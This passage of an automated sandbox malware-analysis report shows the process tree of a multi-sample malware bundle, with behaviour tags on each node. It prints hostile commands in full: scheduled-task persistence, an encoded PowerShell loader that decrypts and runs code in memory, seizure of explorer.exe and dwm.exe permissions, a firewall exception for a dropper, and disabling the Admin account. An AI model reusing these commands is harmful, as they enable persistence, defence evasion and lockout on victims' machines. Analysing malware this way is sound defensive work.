                                                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                23⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:2848
                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\CWbSyF4H5JNy.bat" "
                                                                                                23⤵
                                                                                                  PID:3652
                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                    chcp 65001
                                                                                                    24⤵
                                                                                                      PID:3680
                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                      ping -n 10 localhost
                                                                                                      24⤵
                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                      • Runs ping.exe
                                                                                                      PID:812
                                                                                                    • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                      "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                      24⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                      PID:808
                                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                                        "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                        25⤵
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:2804
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\LA41oKjcaDvN.bat" "
                                                                                                        25⤵
                                                                                                          PID:1552
                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                            chcp 65001
                                                                                                            26⤵
                                                                                                              PID:3924
                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                              ping -n 10 localhost
                                                                                                              26⤵
                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                              • Runs ping.exe
                                                                                                              PID:972
                                                                                                            • C:\Program Files\SubDir\Romilyaa.exe
                                                                                                              "C:\Program Files\SubDir\Romilyaa.exe"
                                                                                                              26⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                              PID:772
                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                "schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f
                                                                                                                27⤵
                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                PID:3076
                                                                                                              • C:\Windows\system32\NOTEPAD.EXE
                                                                                                                "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\pN7IcSI5Ib2q.bat
                                                                                                                27⤵
                                                                                                                • Opens file in notepad (likely ransom note)
                                                                                                                PID:3892
                                                              • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\the.exe
                                                                the.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                PID:4016
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:3112
                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                taskkill /f /im taskmgr.exe
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Kills process with taskkill
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2324
                                                              • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\wimloader.dll
                                                                wimloader.dll
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                PID:3788
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\wimloader_bc2f1887-d493-4fcc-ac3a-25e530939809\caller.cmd" "
                                                                  4⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2552
                                                              • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\ac3.exe
                                                                ac3.exe
                                                                3⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                PID:3840
                                                              • C:\Windows\SysWOW64\notepad.exe
                                                                "C:\Windows\System32\notepad.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\shell1.ps1"
                                                                3⤵
                                                                  PID:2440
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping trustsentry.com -t -n 1 -s 4 -4
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:2668
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping ya.ru -t -n 1 -s 4 -4
                                                                  3⤵
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:1200
                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                  ping tria.ge -t -n 1 -s 4 -4
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                  • Runs ping.exe
                                                                  PID:3720
                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                  xcopy bloatware C:\Users\Admin\Desktop
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Enumerates system info in registry
                                                                  PID:3388
                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                  xcopy beastify.url C:\Users\Admin\Desktop
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Enumerates system info in registry
                                                                  PID:3428
                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                  xcopy shell1.ps1 C:\Users\Admin\Desktop
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Enumerates system info in registry
                                                                  PID:2744
                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                  takeown /R /F C:\Windows\explorer.exe
                                                                  3⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2556
                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                  icacls c:\Windows\explorer.exe /grant Admin:(F)
                                                                  3⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2040
                                                                • C:\Windows\SysWOW64\takeown.exe
                                                                  takeown /R /F C:\Windows\System32\dwm.exe
                                                                  3⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2284
                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                  icacls c:\Windows\System32\dwm.exe /grant Admin:(F)
                                                                  3⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2120
                                                                • C:\Windows\SysWOW64\xcopy.exe
                                                                  xcopy xcer.cer C:\Users\Admin\Desktop
                                                                  3⤵
                                                                  • Enumerates system info in registry
                                                                  PID:2868
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 15
                                                                  3⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:3800
                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                  timeout /t 15
                                                                  3⤵
                                                                  • Delays execution with timeout.exe
                                                                  PID:3428
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\freebobux.exe
                                                                  freebobux.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:1840
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\58CA.tmp\freebobux.bat""
                                                                    4⤵
                                                                    • Loads dropped DLL
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2824
                                                                    • C:\Users\Admin\AppData\Local\Temp\58CA.tmp\CLWCP.exe
                                                                      clwcp c:\temp\bg.bmp
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      • Sets desktop wallpaper using registry
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:2736
                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\58CA.tmp\x.vbs"
                                                                      5⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4000
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\SolaraBootstraper.exe
                                                                  SolaraBootstraper.exe
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:3788
                                                                  • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2072
                                                                  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:3952
                                                                    • C:\Windows\System32\Wbem\wmic.exe
                                                                      "wmic.exe" csproduct get uuid
                                                                      5⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3864
                                                                  • C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe"
                                                                    4⤵
                                                                    • Drops startup file
                                                                    • Executes dropped EXE
                                                                    • Adds Run key to start application
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2172
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\!FIXInj.exe" "!FIXInj.exe" ENABLE
                                                                      5⤵
                                                                      • Modifies Windows Firewall
                                                                      • Event Triggered Execution: Netsh Helper DLL
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:408
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im ctfmon.exe
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Kills process with taskkill
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1704
                                                                • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\wim.dll
                                                                  wim.dll
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:3048
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\wim_b2e36556-3ffb-46e5-bdf1-e29f6550e332\load.cmd" "
                                                                    4⤵
                                                                      PID:1124
                                                                      • C:\Program Files\VideoLAN\VLC\vlc.exe
                                                                        "C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\wim_b2e36556-3ffb-46e5-bdf1-e29f6550e332\cringe.mp4"
                                                                        5⤵
                                                                        • Suspicious behavior: AddClipboardFormatListener
                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        • Suspicious use of SetWindowsHookEx
                                                                        PID:3800
                                                                      • C:\Windows\SysWOW64\NOTEPAD.EXE
                                                                        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\wim_b2e36556-3ffb-46e5-bdf1-e29f6550e332\lol.ini
                                                                        5⤵
                                                                          PID:964
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_b2e36556-3ffb-46e5-bdf1-e29f6550e332\mailgooglecom.json
                                                                          5⤵
                                                                          • Modifies registry class
                                                                          PID:3700
                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                          "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\wim_b2e36556-3ffb-46e5-bdf1-e29f6550e332\CLOCK.py
                                                                          5⤵
                                                                          • Modifies registry class
                                                                          PID:3548
                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                      "C:\Windows\system32\rundll32.exe" cryptext.dll,CryptExtOpenCER C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\xcer.cer
                                                                      3⤵
                                                                        PID:1152
                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                        f3cb220f1aaa32ca310586e5f62dcab1.exe
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:1524
                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                        timeout /t 15
                                                                        3⤵
                                                                        • Delays execution with timeout.exe
                                                                        PID:1352
                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                        xcopy C:\Windows\System32\WinMetadata C:\Users\Admin\Desktop
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Enumerates system info in registry
                                                                        PID:2992
                                                                      • C:\Windows\SysWOW64\regedit.exe
                                                                        regedit
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Runs regedit.exe
                                                                        PID:1884
                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                        xcopy C:\Windows\WinSxS C:\Users\Admin\Desktop
                                                                        3⤵
                                                                        • Enumerates system info in registry
                                                                        PID:3604
                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                        xcopy regmess.exe C:\Users\Admin\Desktop
                                                                        3⤵
                                                                        • Enumerates system info in registry
                                                                        PID:1956
                                                                      • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\jaffa.exe
                                                                        jaffa.exe
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        • Loads dropped DLL
                                                                        • Drops file in System32 directory
                                                                        • Drops file in Windows directory
                                                                        • Modifies registry class
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        • Suspicious use of SendNotifyMessage
                                                                        PID:3736
                                                                        • C:\Windows\SysWOW64\nqgnztrqpu.exe
                                                                          nqgnztrqpu.exe
                                                                          4⤵
                                                                          • Modifies visibility of file extensions in Explorer
                                                                          • Modifies visiblity of hidden/system files in Explorer
                                                                          • Windows security bypass
                                                                          • Disables RegEdit via registry modification
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • Windows security modification
                                                                          • Enumerates connected drives
                                                                          • Modifies WinLogon
                                                                          • Drops file in System32 directory
                                                                          • Modifies registry class
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:2652
                                                                          • C:\Windows\SysWOW64\qzlppdmw.exe
                                                                            C:\Windows\system32\qzlppdmw.exe
                                                                            5⤵
                                                                            • Executes dropped EXE
                                                                            • Enumerates connected drives
                                                                            • Drops file in Program Files directory
                                                                            • Suspicious use of FindShellTrayWindow
                                                                            • Suspicious use of SendNotifyMessage
                                                                            PID:2436
                                                                        • C:\Windows\SysWOW64\dxxlxosfwxrpbom.exe
                                                                          dxxlxosfwxrpbom.exe
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Adds Run key to start application
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:3120
                                                                        • C:\Windows\SysWOW64\qzlppdmw.exe
                                                                          qzlppdmw.exe
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • Enumerates connected drives
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:2316
                                                                        • C:\Windows\SysWOW64\yyatkuwmbosou.exe
                                                                          yyatkuwmbosou.exe
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of FindShellTrayWindow
                                                                          • Suspicious use of SendNotifyMessage
                                                                          PID:3976
                                                                        • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
                                                                          "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Windows\mydoc.rtf"
                                                                          4⤵
                                                                          • Drops file in Windows directory
                                                                          • Suspicious behavior: AddClipboardFormatListener
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:1604
                                                                          • C:\Windows\splwow64.exe
                                                                            C:\Windows\splwow64.exe 12288
                                                                            5⤵
                                                                              PID:3304
                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\helper.vbs"
                                                                          3⤵
                                                                            PID:2736
                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\jkka.exe
                                                                            jkka.exe
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                            PID:3700
                                                                            • C:\Windows\SysWOW64\notepad.exe
                                                                              "C:\Windows\system32\notepad.exe"
                                                                              4⤵
                                                                              • Drops startup file
                                                                              • Loads dropped DLL
                                                                              • NTFS ADS
                                                                              PID:2616
                                                                              • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:972
                                                                                • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe"
                                                                                  6⤵
                                                                                  • Checks computer location settings
                                                                                  • Executes dropped EXE
                                                                                  • Accesses Microsoft Outlook profiles
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  • Suspicious behavior: AddClipboardFormatListener
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  • outlook_office_path
                                                                                  • outlook_win_path
                                                                                  PID:2720
                                                                                • C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\appdata\sjhkhda.exe" 2 2720 259600140
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:376
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im fontdrvhost.exe
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Kills process with taskkill
                                                                            PID:2204
                                                                          • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\selfaware.exe
                                                                            selfaware.exe
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of SetThreadContext
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1684
                                                                            • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\selfaware.exe
                                                                              selfaware.exe
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Loads dropped DLL
                                                                              • Adds Run key to start application
                                                                              PID:3284
                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                icacls "C:\Users\Admin\AppData\Local\fbd3b0c6-9aca-4419-8dc9-2142307974fd" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                5⤵
                                                                                • Possible privilege escalation attempt
                                                                                • Modifies file permissions
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2236
                                                                              • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\selfaware.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\selfaware.exe" --Admin IsNotAutoStart IsNotTask
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                • Loads dropped DLL
                                                                                • Suspicious use of SetThreadContext
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3964
                                                                                • C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\selfaware.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\vir_8487f308-49f0-4714-a868-3f3fcceb6d76\selfaware.exe" --Admin IsNotAutoStart IsNotTask
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1556
                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                            taskkill /f /im explorer.exe
                                                                            3⤵
                                                                            • Kills process with taskkill
                                                                            PID:3428
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net user Admin /active:no
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:3804
                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                              C:\Windows\system32\net1 user Admin /active:no
                                                                              4⤵
                                                                                PID:3548
                                                                            • C:\Windows\SysWOW64\net.exe
                                                                              net user DefaultAccount /active:yes
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3652
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 user DefaultAccount /active:yes
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:3400
                                                                          • C:\Users\Admin\AppData\Local\Temp\ae9fd7a0-db4e-45cc-9194-3f914dae1fa6\packer.exe
